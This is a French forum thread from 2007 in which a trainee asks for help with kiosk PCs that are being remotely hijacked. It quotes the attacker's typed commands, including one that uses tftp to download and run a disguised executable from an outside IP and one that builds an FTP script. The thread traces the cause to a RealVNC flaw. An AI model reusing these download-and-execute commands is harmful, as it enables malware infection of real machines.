[BackDoor] Ligne de commande

Résolu/Fermé
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007 - 24 mai 2007 à 10:14
 Utilisateur anonyme - 29 mai 2007 à 10:06
Bonjour, je suis en formation Maintenance et support informatique dans une petite boite de communication audiovisuelle, nous fournissons à nos clients des PC servant à la diffusion de message publicitaires dans leurs officines.

Ces PC sont conçus par une boite externe et le système d'exploitation est une version de Windows XP Embedded fourni par le propriétaire de notre solution de diffusion.

Nous nous chargeons juste de paramètrer le réseau des clients, d'installer VNC et d'activer le logiciel de diffusion, nous envoyons ensuite la station au client qui la branche sur son modem (paramétré par nous également) afin de pouvoir mettre à jour leurs messages publicitaires depuis les locaux de notre entreprise.

Nous avons un problème sur les deux dernières stations livrées, la diffusion se fait sous une session utilisateur restreinte (Pas d'explorer, juste accès au panneau de controle lorsqu'on presse ctrl + alt + suppr) de temps en temps, le gestionnaire de tâche s'ouvre tout seul mais plus grave, il arrive aussi que le gestionnaire de ligne de commande s'ouvre et ces commandes sont tapées

C:\windows\system32>cmd /c echo open 83.193.60.xxx 37095 >> ik
&echo user muha haha >> ik &echo


Ces problèmes apparaissent à intervalles réguliers et sont plutôt gênant pour les clients.
Sauriez vous comment y remédier?


Merci d'avance
Cordialement.

10 réponses

Utilisateur anonyme
24 mai 2007 à 10:25
Juste une suggestion...on dirait un script qui s'ouvre!
recherches si tu ne trouves pas ---->
*.bat sur ces machines...dès fois qu'un petit génie s'amuse ?
ça me paraît curieux quand même....
ou alors quoi ? une commande en mode direct ?
je suis :-/



1
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007
24 mai 2007 à 10:44
Pas de batch, un scan secuser en ligne ne donne rien.

Par contre, pendant que je lançais le scan quelqu'un d'autre a pris la main et a tapé la commande suivante dans executer

%comscpec% /c echo Reparing user32.dll & echo Please wait...
& tftp -i 75.24.205.xxx get deizvrkx.exe & start deizvrkx&

Le gestionnaire de ligne de com s'est ouvert, je l'ai fermé et il a abandonné.
0
Utilisateur anonyme
24 mai 2007 à 11:24
tentative d'infection de virus ça :
deizvrkx.exe
tu mets un keylogger sur chaque station...(je plaisante !)
Non...mais tu as une piste à mon avis !
Il y a un pirate dans la place ?
0
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007
24 mai 2007 à 11:37
"Il y a un pirate dans la place?"

On dirait bien, mais on dirait aussi qu'il est négligeant...
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Utilisateur anonyme
24 mai 2007 à 12:41
D'accord, mais tu me croire qu"il a quand même quelques connaissances en la matière !!
ce machin est un nom aléatoire--->
deizvrkx.exe
Je suppose qu'il n'y a pas moyen de mettre un fire-wall sur chaque machine ?

0
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007
24 mai 2007 à 14:03
Bin, les modems fournis sont déja equipés de firewall.

Une CEBOX pour l'un qui est au client (Bon ok...) et l'autre est un DLINK DSL-504T

On devrait pouvoir activer le firewall de windows mais je doute de son efficacité.
0
Utilisateur anonyme
24 mai 2007 à 18:50
Celui de xp....une véritable passoire !
Sinon, tu as des gratuits, qui sont pas mal.
Zone alarm/Kerio/ en tous cas une chose est sûr...pour le moment il passe au-dessus ...et à ce train-là tu risque de te retrouver avec tous le système infecté !
C'est ce qu'il cherche à mon avis !


0
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007
25 mai 2007 à 11:42
Je pense avoir résolu le problème.

Nous utilisons Real VNC pour la télémaintenance, la version que nous utilisions jusqu'ici était la 4.1.1, or une faille permettant de prendre le contrôle du PC a distance sans utiliser de mot de passe a été déclarée en Mai 2006.

Le passage à la 4.1.2 à apparemment résolu le problème.
0
Utilisateur anonyme
25 mai 2007 à 11:59
ça j'ignorais, je dois dire...
Tu veux dire que tu n'as plus de soucis de coté là ?
0
Theartemis Messages postés 13 Date d'inscription jeudi 26 octobre 2006 Statut Membre Dernière intervention 29 mai 2007
29 mai 2007 à 10:03
Je n'ai effectivement plus de soucis.

Enfin bon, je quitte la boite bientôt, un recommandé m'attends...

Ils se débrouilleront si ça n'a pas résolu le problème
0
Utilisateur anonyme
29 mai 2007 à 10:06
Bon, courage à toi.
Cordialement.
0